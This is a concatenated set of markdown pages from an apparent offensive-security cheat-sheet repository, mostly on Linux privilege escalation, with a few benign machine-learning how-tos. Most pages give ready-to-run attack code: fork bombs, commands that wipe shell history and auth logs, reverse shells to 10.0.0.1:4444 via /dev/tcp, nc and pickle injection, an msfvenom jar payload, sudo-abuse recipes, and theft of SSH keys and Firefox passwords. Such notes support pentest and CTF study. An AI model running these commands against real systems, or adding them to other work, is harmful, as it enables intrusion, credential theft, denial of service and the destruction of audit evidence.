3 | description: Fork Bomb is one of the denial-of-service attacks which lead the system to deplete the available resources by replicating a child process infinitely.
4 | tags:
5 | - Linux
6 | refs:
7 | - https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp
8 | - https://www.imperva.com/learn/ddos/fork-bomb/
9 | date: 2023-07-24
10 | draft: false
11 | ---
12 |
13 | ### Warning
14 |
15 | **Please don’t execute the following programs in system that you don’t want to harm.**
16 |
17 | ## Exploitation in C
18 |
19 | This program forks child processes continuously.
20 |
21 | ```c
22 | #include
23 | #include
24 |
25 | int main()
26 | {
27 | while (1)
28 | // Create a child process from the parent process.
29 | fork();
30 | return 0;
31 | }
32 | ```
33 |
34 | ## Exploitation in Python
35 |
36 | ```python
37 | import os
38 |
39 | while True:
40 | os.fork()
41 | ```
42 |
43 | ## Exploitation in Bash
44 |
45 | ```bash
46 | :(){ :|: & };:
47 | ```
48 |
--------------------------------------------------------------------------------
/src/exploit/linux/backup/_data.yml:
--------------------------------------------------------------------------------
1 | category2: backup
--------------------------------------------------------------------------------
/src/exploit/linux/backup/borgbackup-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: BorgBackup Pentesting
3 | description: A deduplicating backup program.
4 | tags:
5 | - Backup
6 | - Linux
7 | refs:
8 | date: 2023-04-10
9 | draft: false
10 | ---
11 |
12 | ## Extract Archives
13 |
14 | ```sh
15 | borg extract /path/to/archive::
16 | Enter passphrase:
17 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/container/_data.yml:
--------------------------------------------------------------------------------
1 | category2: container
--------------------------------------------------------------------------------
/src/exploit/linux/management/_data.yml:
--------------------------------------------------------------------------------
1 | category2: management
--------------------------------------------------------------------------------
/src/exploit/linux/post-exploitation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: post-exploitation
--------------------------------------------------------------------------------
/src/exploit/linux/post-exploitation/cover-your-tracks-in-linux.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cover Your Tracks in Linux
3 | description: After exploitation in Linux system, attackers want to erase their activities and be undetectable.
4 | tags:
5 | - Post Exploitation
6 | refs:
7 | - https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/
8 | - https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/
9 | date: 2023-11-15
10 | draft: false
11 | ---
12 |
13 | ## Clear History
14 |
15 | ```bash
16 | unset HISTORY
17 | echo '' > ~/.bash_history
18 | echo '' > /root/.bash_history
19 | history -c
20 | export HISTSIZE=0
21 | unset HISTFILE
22 | ```
23 |
24 |
25 |
26 | ## Clear Logs
27 |
28 | ```bash
29 | # Shrink the size of log files with `truncate -s 0`
30 | truncate -s 0 /var/log/auth.log
31 | echo '' > /var/log/auth.log
32 | cat /dev/null > /var/log/auth.log
33 | > /var/log/auth.log
34 | dd if=/dev/null of=/var/log/auth.log
35 | shred /var/log/auth.log
36 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: privilege-escalation
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/doas/_data.yml:
--------------------------------------------------------------------------------
1 | category3: doas
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/doas/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Doas Privilege Escalation
3 | description: doas executes arbitrary commands as another user. It's similar to sudo command. doas.conf is interesting to privilege escalation.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-03-07
9 | draft: false
10 | ---
11 |
12 | ## Investigation
13 |
14 | First of all, search location of doas.conf.
15 |
16 | ```sh
17 | find / -type f -name "doas.conf" 2>/dev/null
18 | ```
19 |
20 | Next check the configuration.
21 |
22 | ```sh
23 | doas -C /path/to/doas.conf
24 | doas -C /etc/doas.conf
25 | # or
26 | cat /etc/doas.conf
27 | ```
28 |
29 | Execute doas as below.
30 |
31 | ```sh
32 | doas -u root
33 | ```
34 |
35 | Please also refer to [GTFOBins](https://gtfobins.github.io/) to PrivEsc.
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/firefox-credentials-dumping.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: FireFox Credentials Dumping
3 | description: A .mofilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privilege using them.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2024-10-03
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | If there is a `.mozilla/firefox` directory in some user's home directory, we can dump credentials. So check this directory:
14 |
15 | ```sh
16 | ls -al /home//.mozilla/
17 | ```
18 |
19 |
20 |
21 | ## Dump Passwords from Firefox Profile
22 |
23 | To crack it, use [firefox_decrypt](https://github.com/unode/firefox_decrypt):
24 |
25 | ```sh
26 | python3 firefox_decrypt.py .mozilla/firefox/
27 | ```
28 |
29 | If we’ll be asked the master password and we don’t know it, try common passwords.
30 |
31 | ```txt
32 | admin
33 | password
34 | password1
35 | password123
36 | root
37 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/ghidra-debug-mode-rce.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Ghidra Debug Mode RCE
3 | description:
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - https://www.youtube.com/watch?v=N3VcWIUpgfE
9 | - https://github.com/NationalSecurityAgency/ghidra/issues/6
10 | date: 2023-03-31
11 | draft: false
12 | ---
13 |
14 | ## Exploitation
15 |
16 | ```bash
17 | jdb -attach 127.0.0.1:18001
18 | > classpath
19 | > classes
20 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
21 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh")
22 | ```
23 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/gnuplot-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gnuplot Privilege Escalation
3 | description: gnuplot is a command-line and GUI program that can generate two- and three-dimentional plots of functions, data, and data fits.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - http://gnuplot.info/docs_5.5/loc18483.html
9 | date: 2023-06-19
10 | draft: false
11 | ---
12 |
13 | ## Command Execution
14 |
15 | The script file of **`gnuplot`** can be used to execute system commands as below.
16 |
17 | ```bash
18 | gnuplot test.plt
19 | ```
20 |
21 | Contents of the **`.plt`** is like the following.
22 |
23 | ```bash
24 | system "whoami"
25 |
26 | # Reverse shell
27 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/irb-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: irb (Interactive Ruby Shell) Privilege Escalation
3 | description:
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Exploitation
12 |
13 | ```bash
14 | irb
15 |
16 | # #q!: Define a string literal
17 | > exec %q!whoami!
18 | > exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash!
19 | > exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"!
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/python-eval-code-execution.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Python Eval Code Execution
3 | description: Python's eval() method is vulnerable to arbitrary code execution.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | - Web
8 | refs:
9 | date: 2023-04-11
10 | draft: false
11 | ---
12 |
13 | ## Investigation
14 |
15 | ```py
16 | eval(text)
17 | eval(f"5 + {num}")
18 | ```
19 |
20 | If the Python script allows us to input some value to the **"text"** variable, we can inject arbitrary code.
21 |
22 |
23 |
24 | ## Arbitrary Code Execution
25 |
26 | Most of the time, we need to bypass another expression to execute our desired command.
27 |
28 | ```html
29 | __import__('os').system('id')
30 |
31 |
32 | ),__import__('os').system('id')
33 | '),__import__('os').system('id')
34 | },__import__('os').system('id')
35 | ),__import__('os').system('id')#
36 | ```
37 |
38 | ### Reverse Shell
39 |
40 | ```html
41 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')
42 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/rust-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Rust Privilege Escalation
3 | description: Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have a write permission of a Rust file, we may be able to inject arbitrary code to escalate privileges.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
9 | date: 2023-06-27
10 | draft: false
11 | ---
12 |
13 | ## Reverse Shell
14 |
15 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs
16 |
17 | We can create a binary or module to reverse shell.
18 |
19 | ```bash
20 | cd /path/to/rust/project/src
21 | vim lib.rs
22 | (In vim editor, insert a reverse shell code into a file)
23 | cargo build
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/snapd-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Snapd Privilege Escalation
3 | description: Snapd might be vulnerable to privilege escalation.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 |
13 | ## dirty_sock (CVE-2019-7304) Version < 2.37
14 |
15 | Reference: [https://www.exploit-db.com/exploits/46361](https://www.exploit-db.com/exploits/46361)
16 |
17 |
18 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sssd-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SSSD Privilege Escalation
3 | description: SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-04-16
9 | draft: false
10 | ---
11 |
12 | ## Find Credentials
13 |
14 | ```bash
15 | ls -la /var/lib/sss/
16 |
17 | # Find credentials
18 | # If we find the hash, crack it using John or Hashcat.
19 | strings /var/lib/sss/db/example.ldb
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/_data.yml:
--------------------------------------------------------------------------------
1 | category3: sudo
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Fail2ban-Client Privilege Escalation
3 | description: Sudo fail2ban-client command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2025-03-12
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | # Output:
17 | (ALL) NOPASSWD: /usr/bin/fail2ban-client
18 | ```
19 |
20 | If we can execute `fail2ban-client` command as root, we may be able to escalate privilege and gain a root shell.
21 |
22 | ## Exploit
23 |
24 | ```bash
25 | # Get jail list
26 | sudo /usr/bin/fail2ban-client status
27 | # Choose one of the jails from the "Jail list" in the output.
28 | sudo /usr/bin/fail2ban-client get actions
29 | # Create a new action with arbitrary name (e.g. "evil")
30 | sudo /usr/bin/fail2ban-client set addaction evil
31 | # Set payload to actionban
32 | sudo /usr/bin/fail2ban-client set action evil actionban "chmod +s /bin/bash"
33 | # Trigger the action
34 | sudo /usr/bin/fail2ban-client set banip 1.2.3.5
35 | # Now we gain a root
36 | /bin/bash -p
37 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-java-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Java Privilege Escalation
3 | description: Sudo Java is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-14
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | (root) /usr/bin/java -jar *.jar
17 | ```
18 |
19 | If we can execute java command with arbitrary **`.jar`** file as root, we can escalate to privileges.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | ### 1. Create a JAR File
26 |
27 | First, create a custom jar file in local machine.
28 | Replace **``** with your local ip address.
29 |
30 | ```bash
31 | msfvenom -p java/shell_reverse_tcp LHOST= LPORT=4444 -f jar -o shell.jar
32 | ```
33 |
34 | Then transfer the file to remote machine.
35 |
36 | ### 2. Reverse Shell
37 |
38 | In local machine, start a listener.
39 |
40 | ```bash
41 | nc -lvnp 4444
42 | ```
43 |
44 | Now execute the java command as root in target machine.
45 |
46 | ```bash
47 | sudo /usr/bin/java -jar /tmp/shell.jar
48 | ```
49 |
50 | We should get a root shell.
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Path Traversal Privilege Escalation
3 | description: If some sudo command receives a file path, we might escalate to privileges using path traversal.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) /usr/bin/node /usr/local/scripts/*.js
17 | ```
18 |
19 | If the file path uses wildcards, we may execute arbitrary files.
20 | In short, we can refer to files in different directories which the system owner unintended.
21 |
22 |
23 |
24 | ## Exploitation
25 |
26 | Assume we can execute ‘node’ command as root and js file.
27 | Create the **“test.js”** under **/tmp**, which spawns a root shell after executing **‘node’** command.
28 |
29 | ```jsx
30 | // /tmp/test.js
31 | require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
32 | ```
33 |
34 | Now run **‘node’** command as root. We can pass the file using path traversal.
35 |
36 | ```jsx
37 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js
38 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-screen-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Screen Privilege Escalation
3 | description: Sudo screen command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (root) /usr/bin/screen -r testsession
17 | ```
18 |
19 | If we can execute **"screen"** command as root, we can spawn a root shell from the screen session.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | First execute **"screen"** command as root, then a screen session will be start.
26 | Now we can spawn a root shell by pressing **“Ctrl+a+c”** in the screen session.
27 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Shutdown, Poweroff Privilege Escalation
3 | description: Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) NOPASS: /usr/sbin/shutdown
17 | ```
18 |
19 | If we can execute **"shutdown"** command as root, we can gain access to privileges by overwriting the path of **"poweroff"**.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | First create **/tmp/poweroff** binary which invoke a shell.
26 |
27 | ```sh
28 | echo /bin/sh > /tmp/poweroff
29 | # or
30 | echo /bin/bash > /tmp/poweroff
31 | ```
32 |
33 | Then change permissions of the file and add **"/tmp"** folder to **PATH**.
34 |
35 | ```sh
36 | chmod +x /tmp/poweroff
37 | export PATH=/tmp:$PATH
38 | ```
39 |
40 | Now execute **"shutdown"** as root.
41 |
42 | ```sh
43 | # Some SUID command
44 | sudo /usr/sbin/shutdown
45 |
46 | # Then you are root user
47 | root>
48 | ```
49 |
50 | **/tmp/poweroff** is executed and spawn a root shell.
51 |
52 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-umount-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Umount Privilege Escalation
3 | description: Sudo umount is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-15
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | (root) NOPASSWD: /bin/umount
17 | ```
18 |
19 | If we can execute umount command as root, we can escalate to privilege.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | In target machine, check what directory is mounted.
26 |
27 | ```bash
28 | cat /etc/fstab
29 | showmount -e localhost
30 | ```
31 |
32 | Assume the **`/opt/example`** folder is mounted.
33 | If we unmount this folder, original files, that existed before the directory is mounted, may appear.
34 |
35 | ```bash
36 | sudo /bin/umount /opt/example
37 | ls -al /opt/example
38 | ```
39 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-wall-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Wall Privilege Escalation
3 | description: Wall command can display the result of OS command. Executing as root might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) NOPASSWD: wall
17 | ```
18 |
19 |
20 |
21 | ## Exploitation
22 |
23 | ```sh
24 | # Reverse shell
25 | sudo wall "$(bash -c 'bash -i >& /dev/tcp// 0>&1')"
26 |
27 | # Gets a SSH private key of another user
28 | sudo wall "$(cat /home/user/.ssh/id_rsa)"
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudoedit Privilege Escalation
3 | description: Sudoedit is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | - https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf
8 | date: 2023-03-29
9 | draft: false
10 | ---
11 |
12 | ## Investigation
13 |
14 | ```bash
15 | sudo -l
16 |
17 | (root) sudoedit /opt/example.txt
18 | ```
19 |
20 | If we can execute sudoedit command as root, we might be able to escalate the privileges with some version.
21 |
22 |
23 |
24 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf))
25 |
26 | ```bash
27 | export EDITOR="vim -- /etc/sudoers"
28 | sudoedit /opt/example.txt
29 | ```
30 |
31 | In vim editor, add the following line in **`/etc/sudoers`**.
32 | Assume the current username is “john”
33 |
34 | ```bash
35 | john ALL=(ALL:ALL) ALL
36 | ```
37 |
38 | After that, we can escalate to root privilege.
39 |
40 | ```bash
41 | sudo su root
42 | ```
43 |
--------------------------------------------------------------------------------
/src/exploit/linux/protocol/_data.yml:
--------------------------------------------------------------------------------
1 | category2: protocol
--------------------------------------------------------------------------------
/src/exploit/linux/protocol/x11-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: X11 (X Window System) Pentesting
3 | description: The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000, 6001.
4 | tags:
5 | - Linux
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script x11-access -p 6000
15 |
16 | msf> use auxiliary/scanner/x11/open_x11
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/_data.yml:
--------------------------------------------------------------------------------
1 | category1: machine-learning
2 | related_menus:
3 | - title: Data Processing
4 | id: data-processing
5 | - title: Computer Vision
6 | id: computer-vision
7 | - title: LLM
8 | id: llm
9 | - title: Model
10 | id: model
11 | - title: Others
12 | id: others
--------------------------------------------------------------------------------
/src/exploit/machine-learning/computer-vision/Image-Recognition-Bypass-for-Machine-Learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Image Recognition Bypass for Machine Learning
3 | description: We can trick image recognizer or classifier by adding filters or obfuscating an image.
4 | tags:
5 | - Computer Vision
6 | - Machine Learning
7 | refs:
8 | date: 2023-08-18
9 | draft: false
10 | ---
11 |
12 | The following techniques include those that are ineffective currently or in the future..
13 |
14 | ## Blurring
15 |
16 | ```python
17 | from PIL import Image
18 | from PIL import ImageFilter
19 |
20 | img = Image.open("example.png")
21 |
22 | # Box blur
23 | img1 = img.filter(ImageFilter.BoxBlur(5))
24 | # Gaussian blur
25 | img2 = img.filter(ImageFilter.GaussianBlur(5))
26 | # Median filter
27 | img3 = img.filter(ImageFilter.MedianFilter(size=5))
28 | # Rank filter
29 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5))
30 | ```
31 |
32 |
33 |
34 | ## Cropping/Rotating
35 |
36 | ```python
37 | from PIL import Image
38 | from PIL import ImageFilter
39 |
40 | img = Image.open("example.png")
41 | img = img.resize((512, 512))
42 |
43 | img1 = img.crop((0, 0, 300, 280)).rotate(-60)
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/computer-vision/_data.yml:
--------------------------------------------------------------------------------
1 | category2: computer-vision
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/_data.yml:
--------------------------------------------------------------------------------
1 | category2: data-processing
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/data-visualization-for-machine-learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Data Visualization for Machine Learning
3 | description:
4 | tags:
5 | - Machine Learning
6 | refs:
7 | date: 2024-06-19
8 | draft: false
9 | ---
10 |
11 | ## Simple Example
12 |
13 | ```py
14 | import pandas as pd
15 | import matplotlib.pyplot as plt
16 |
17 | df = pd.read_csv('example.csv', index_col=0)
18 |
19 | plt.figure(figsize=(5, 6))
20 |
21 | # Choose a graph type
22 | plt.bar(df['Name'], df['Age'], color='red')
23 | # or
24 | plt.scatter(df['Name'], df['Age'], alpha=0.5)
25 |
26 | # Set title and labels
27 | plt.title("Example Title")
28 | plt.xlabel("Name")
29 | plt.ylabel("Age")
30 |
31 | # Display
32 | plt.show()
33 | ```
--------------------------------------------------------------------------------
/src/exploit/machine-learning/data-processing/dimensionality-reduction-for-machine-learning.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Dimensionality Reduction for Machine Learning
3 | description: Dimensionality Reduction is a data processing to make machine learning models easier to train.
4 | tags:
5 | - Data Processing
6 | - Machine Learning
7 | refs:
8 | - https://www.kaggle.com/competitions/ai-village-ctf
9 | date: 2023-08-20
10 | draft: false
11 | ---
12 |
13 | ## PCA (Principal Component Analysis)
14 |
15 | Reference: [https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42](https://www.kaggle.com/code/jonbown/ai-ctf-submissions?scriptVersionId=105606691&cellId=42)
16 |
17 | we use **PCA** to find the optimal dimensions for data.
18 |
19 | ```python
20 | import numpy as np
21 | from sklearn.decomposition import PCA
22 |
23 | data = np.load("example.npy")
24 |
25 | for i in range(1, 10):
26 | pca = PCA(n_components=i)
27 | principal_components = pca.fit_transform(data)
28 | print(pca.explained_variance_ratio_)
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/llm/_data.yml:
--------------------------------------------------------------------------------
1 | category2: llm
--------------------------------------------------------------------------------
/src/exploit/machine-learning/model/_data.yml:
--------------------------------------------------------------------------------
1 | category2: model
--------------------------------------------------------------------------------
/src/exploit/machine-learning/model/pickle-code-injection.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Pickle Code Injection
3 | description:
4 | tags:
5 | - Machine Learning
6 | refs:
7 | - https://github.com/trailofbits/fickling
8 | - https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/
9 | - https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html
10 | date: 2024-07-17
11 | draft: false
12 | ---
13 |
14 | ## Exploit
15 |
16 | ```bash
17 | fickling --inject "import os; os.system('/bin/bash')" example.pkl
18 |
19 | # Reverse shell (replace "10.0.0.1" and 4444 with your own)
20 | fickling --inject 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' example.pkl
21 | ```
22 |
--------------------------------------------------------------------------------
/src/exploit/machine-learning/orange-data-mining.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Orange Data Mining
3 | description: Orange is a data-mining and machine learning software that allows users to analyze data, create visualizations, and build predictive models.
4 | tags:
5 | - Machine Learning
6 | refs:
7 | - https://orange3.readthedocs.io/projects/orange-visual-programming/en/latest/index.html
8 | date: 2023-03-20
9 | draft: false
10 | ---
11 |
12 | ## Installation & Start
13 |
14 | To install Orange, we can install it with pip in Linux.
15 |
16 | ```bash
17 | pip install PyQt5 PyQtWebEngine
18 | pip install orange3
19 | ```
20 |
21 |
22 |
23 | ## Basic Usage
24 |
25 | ### 1. Start Orange Software
26 |
27 | ```bash
28 | python -m Orange.canvas
29 | ```
30 |
31 | ### 2. Open .OWS File
32 |
33 | When the Orange starts, open the “.ows” file.
34 |
35 | ### 3. Import Data File
36 |
37 | Add the File widget in the left pane, and import data file such as “.csv”.
38 |
39 | ### 4. Workflows
40 |
41 | Connect the File widget with the Scatter Plot widget and open the Scatter Plot. We can see the data with plot.
--------------------------------------------------------------------------------
/src/exploit/machine-learning/read-pt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Read PT File
3 | description: A PT file is a machine learning model file generated by PyTorch.
4 | tags:
5 | - Machine Learning
6 | refs:
7 | date: 2023-03-26
8 | draft: false
9 | ---
10 |
11 | ## Load Model from PT
12 |
13 | ```python
14 | import torch
15 | import torch.nn as nn
16 |
17 | class ExampleModel(nn.Module):
18 | def __init__(self):
19 | super().__init__()
20 | self.flatten = nn.Flatten()
21 | self.linear_relu_stack = nn.Sequential(
22 | nn.Linear(28*28, 512),
23 | nn.ReLU(),
24 | nn.Linear(512, 10))
25 |
26 | def forward(self, x):
27 | x = self.flatten(x)
28 | logits = self.linear_relu_stack(x)
29 | return logits
30 |
31 | model = ExampleModel()
32 | model.load_state_dict(torch.load('example.pt'))
33 | print(model)
34 | ```
--------------------------------------------------------------------------------
/src/exploit/malware/_data.yml:
--------------------------------------------------------------------------------
1 | category1: malware
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/malware/maldoc-analysis.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Maldoc Analysis
3 | description: Malicious Documents (.doc) are Microsoft documents contain malicious execution code.
4 | tags:
5 | - Malware
6 | refs:
7 | date: 2023-08-06
8 | draft: false
9 | ---
10 |
11 | ## Static Analysis
12 |
13 | ### Extract Files in Doc
14 |
15 | ```bash
16 | unzip example.doc
17 | ```
18 |
19 | ### Find Interesting Information
20 |
21 | ```bash
22 | strings example.doc
23 | exiftool example.doc
24 | binwalk -e example.doc
25 | ```
26 |
27 | Additionally, we can use CyberChef. Follow this steps:
28 |
29 | 1. Open **CyberChef**
30 | 2. Upload the suspicious doc file on CyberChef.
31 | 3. Use the **"Strings"** function to extract strings.
32 | 4. If you found obfuscated strings in the results, add the **"Find / Replace"** function to remove extra strings.
33 | 5. If necessary, add the **"Drop bytes"** function to remove extra bytes.
34 |
35 | ### Dump Macros
36 |
37 | If you don’t have `oletools`, install it first.
38 |
39 | ```bash
40 | # Install `oletools` module
41 | python -m ven venv
42 | source venv/bin/activate
43 | pip install oletools
44 | ```
45 |
46 | To dump macros, run the following command.
47 |
48 | ```bash
49 | olevba -c example.doc
50 | ```
51 |
--------------------------------------------------------------------------------
/src/exploit/malware/npm-supply-chain-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NPM Supply Chain Attack
3 | description: An attacker might be able to lead an organization to install a malicious NPM package by abusing misconfiguration of the internal proxy server or package manager.
4 | tags:
5 | - Malware
6 | - Supply Chain
7 | refs:
8 | - https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
9 | - https://snyk.io/blog/npm-security-preventing-supply-chain-attacks/
10 | date: 2023-07-12
11 | draft: false
12 | ---
13 |
14 | This page has lack of content yet.
15 |
16 | ## Dependency Confusion
17 |
18 | The [PoC](https://github.com/x1337loser/Dependency-Confusion) is available thanks to the researcher who discovered the threat.
19 |
20 |
21 |
22 | ## Lock File Injection
23 |
24 | Attackers may insert their malicious npm package into **`yarn.lock`** or **`package-lock.json`** in the target project.
--------------------------------------------------------------------------------
/src/exploit/memory/_data.yml:
--------------------------------------------------------------------------------
1 | category1: memory
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/mobile/_data.yml:
--------------------------------------------------------------------------------
1 | category1: mobile
2 | related_menus:
3 | - title: Android
4 | id: android
--------------------------------------------------------------------------------
/src/exploit/mobile/android/_data.yml:
--------------------------------------------------------------------------------
1 | category2: android
--------------------------------------------------------------------------------
/src/exploit/network/_data.yml:
--------------------------------------------------------------------------------
1 | category1: network
2 | related_menus:
3 | - title: Protocol
4 | id: protocol
5 | - title: Port Forwarding
6 | id: port-forwarding
7 | - title: WiFi
8 | id: wifi
9 | - title: Attack
10 | id: attack
11 | - title: Tool
12 | id: tool
13 | - title: VPN
14 | id: vpn
15 | - title: Others
16 | id: others
--------------------------------------------------------------------------------
/src/exploit/network/arp-spoofing.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ARP (Address Resolution Protocol) Spoofing
